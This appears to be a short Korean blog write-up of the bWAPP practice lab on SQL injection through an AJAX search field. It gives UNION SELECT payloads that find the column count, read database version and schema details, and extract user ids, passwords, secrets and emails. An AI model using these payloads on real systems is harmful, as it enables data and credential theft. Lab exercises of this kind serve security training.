bWAPP SQL Injection [ AJAX/JSON/jQuery ] Current : low
한 글자만 입력해도 검색한 글자가 존재하는 검색 내용이 아래와 같이 출력됩니다.
따라서
'UNION ALL SELECT 1,2,3,4,5,6,7# 를 통해 아래와 같이 칼럼 길이를 구합니다.
구한 칼럼 길이를 통해
'UNION ALL SELECT 1,@@version,@@datadir,database(),5,6,7# 를 통해 데이터 베이스의 정보를 아래와 같이 획득하는것을 확인할 수 있습니다.
따라서 ,
'UNION SELECT 1,column_name,3,4,5,6,7 from information_schma.columns# 를 통해 데이터 베이스의 추가 정보를 획득합니다.
다음과 같이
login , date , password , secret , eamil 등 다양한 정보를 획득이 가능합니다.
획득한 정보를 가지고 이제
'UNION SELECT 1,id,password,secret,email,6,7 from users# 를 통해 아래와 같이 중요 정보를 획득할 수 있어 SQL Injection 에 취약합니다.
댓글
댓글 쓰기